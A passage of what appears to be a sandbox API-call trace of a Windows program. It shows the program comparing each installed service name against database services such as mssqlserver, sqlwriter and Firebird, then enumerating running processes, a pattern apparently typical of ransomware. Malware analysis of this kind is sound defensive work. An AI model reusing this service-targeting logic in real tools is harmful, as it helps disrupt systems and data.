lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0050.924] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0050.924] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0050.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0050.924] lstrlenW (lpString="LanmanWorkstation") returned 17 [0050.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0050.924] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0050.924] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0050.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0050.924] lstrlenW (lpString="lfsvc") returned 5 [0050.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0050.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0050.924] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0050.924] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0050.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0050.925] lstrlenW (lpString="lmhosts") returned 7 [0050.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0050.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0050.925] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0050.925] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0050.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0050.925] lstrlenW (lpString="LSM") returned 3 [0050.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0050.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0050.925] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0050.925] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0050.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0050.925] lstrlenW (lpString="MpsSvc") returned 6 [0050.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0050.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0050.925] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0050.925] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0050.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0050.925] lstrlenW (lpString="NcbService") returned 10 [0050.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0050.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0050.925] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0050.925] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0050.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0050.925] lstrlenW (lpString="netprofm") returned 8 [0050.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0050.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0050.925] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0050.925] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0050.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0050.925] lstrlenW (lpString="NlaSvc") returned 6 [0050.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0050.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0050.926] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0050.926] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0050.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0050.926] lstrlenW (lpString="nsi") returned 3 [0050.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0050.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0050.926] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0050.926] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0050.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0050.926] lstrlenW (lpString="PcaSvc") returned 6 [0050.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0050.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0050.926] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0050.926] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0050.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0050.926] lstrlenW (lpString="PlugPlay") returned 8 [0050.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0050.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0050.926] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0050.926] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0050.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0050.926] lstrlenW (lpString="Power") returned 5 [0050.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0050.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0050.926] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0050.926] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0050.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0050.926] lstrlenW (lpString="ProfSvc") returned 7 [0050.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0050.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0050.926] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0050.927] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0050.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0050.927] lstrlenW (lpString="RpcEptMapper") returned 12 [0050.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.927] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0050.927] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0050.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0050.927] lstrlenW (lpString="RpcSs") returned 5 [0050.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0050.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0050.927] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0050.927] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0050.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0050.927] lstrlenW (lpString="SamSs") returned 5 [0050.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0050.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0050.927] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0050.927] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0050.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0050.927] lstrlenW (lpString="Schedule") returned 8 [0050.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0050.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0050.927] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0050.927] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0050.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0050.927] lstrlenW (lpString="SecurityHealthService") returned 21 [0050.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0050.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0050.928] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0050.928] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0050.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0050.928] lstrlenW (lpString="SENS") returned 4 [0050.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0050.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0050.928] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0050.928] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0050.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0050.928] lstrlenW (lpString="ShellHWDetection") returned 16 [0050.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.928] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0050.928] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0050.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0050.928] lstrlenW (lpString="Spooler") returned 7 [0050.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0050.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0050.928] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0050.928] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0050.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0050.928] lstrlenW (lpString="SSDPSRV") returned 7 [0050.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0050.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0050.928] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0050.929] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0050.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0050.929] lstrlenW (lpString="StateRepository") returned 15 [0050.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0050.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0050.929] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0050.929] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0050.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0050.929] lstrlenW (lpString="SysMain") returned 7 [0050.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0050.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0050.929] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0050.929] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0050.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0050.929] lstrlenW (lpString="SystemEventsBroker") returned 18 [0050.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0050.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0050.929] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0050.929] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0050.929] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x636198 | out: hHeap=0x5d0000) returned 1 [0050.929] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0050.933] Process32FirstW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.934] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0050.934] lstrlenW (lpString="System") returned 6 [0050.934] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0050.954] lstrlenW (lpString="smss.exe") returned 8 [0050.954] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.955] lstrlenW (lpString="csrss.exe") returned 9 [0050.955] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0050.956] lstrlenW (lpString="wininit.exe") returned 11 [0050.956] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.956] lstrlenW (lpString="csrss.exe") returned 9 [0050.956] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0050.957] lstrlenW (lpString="winlogon.exe") returned 12 [0050.957] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0050.958] lstrlenW (lpString="services.exe") returned 12 [0050.958] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0050.958] lstrlenW (lpString="lsass.exe") returned 9 [0050.958] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.959] lstrlenW (lpString="svchost.exe") returned 11 [0050.959] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0050.960] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0050.960] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0050.960] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0050.960] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.961] lstrlenW (lpString="svchost.exe") returned 11 [0050.961] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0050.962] lstrlenW (lpString="dwm.exe") returned 7 [0050.962] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.966] lstrlenW (lpString="svchost.exe") returned 11 [0050.966] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.967] lstrlenW (lpString="svchost.exe") returned 11 [0050.967] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.967] lstrlenW (lpString="svchost.exe") returned 11 [0050.967] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.968] lstrlenW (lpString="svchost.exe") returned 11 [0050.968] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.969] lstrlenW (lpString="svchost.exe") returned 11 [0050.969] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.969] lstrlenW (lpString="svchost.exe") returned 11 [0050.969] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.970] lstrlenW (lpString="svchost.exe") returned 11 [0050.970] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.971] lstrlenW (lpString="svchost.exe") returned 11 [0050.971] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.972] lstrlenW (lpString="svchost.exe") returned 11 [0050.972] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0050.972] lstrlenW (lpString="spoolsv.exe") returned 11 [0050.972] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.973] lstrlenW (lpString="svchost.exe") returned 11 [0050.973] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.973] lstrlenW (lpString="svchost.exe") returned 11 [0050.974] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0050.974] lstrlenW (lpString="audiodg.exe") returned 11 [0050.974] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0050.975] lstrlenW (lpString="sihost.exe") returned 10 [0050.975] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.976] lstrlenW (lpString="svchost.exe") returned 11 [0050.976] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0050.976] lstrlenW (lpString="taskhostw.exe") returned 13 [0050.976] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0050.977] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0050.977] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0050.978] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0050.978] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0050.979] lstrlenW (lpString="explorer.exe") returned 12 [0050.979] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0050.979] lstrlenW (lpString="Memory Compression") returned 18 [0050.979] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0050.980] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0050.980] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0050.981] lstrlenW (lpString="SearchUI.exe") returned 12 [0050.981] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0050.982] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0050.982] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0050.983] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0050.983] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0050.983] lstrlenW 